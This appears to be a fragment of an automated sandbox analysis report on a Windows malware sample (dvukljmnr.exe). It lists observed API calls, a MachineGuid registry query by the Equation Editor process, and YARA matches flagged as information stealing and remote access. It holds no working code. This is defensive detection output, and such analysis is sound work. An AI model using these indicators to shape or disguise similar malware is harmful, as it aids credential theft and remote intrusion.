Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,		6_2_009B8529
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,		6_2_009B8529
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,		6_2_009BE799
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		6_2_009B8FA3
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: GetLocaleInfoW,		6_2_009B9FDB
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,		6_2_009BA75F
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: EnumSystemLocalesW,		6_2_009B9F55

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Code function: 5_2_009B00A3 cpuid

5_2_009B00A3

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Code function: 5_2_009B161F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_009B161F

Stealing of Sensitive Information

Source: Yara match	File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match	File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY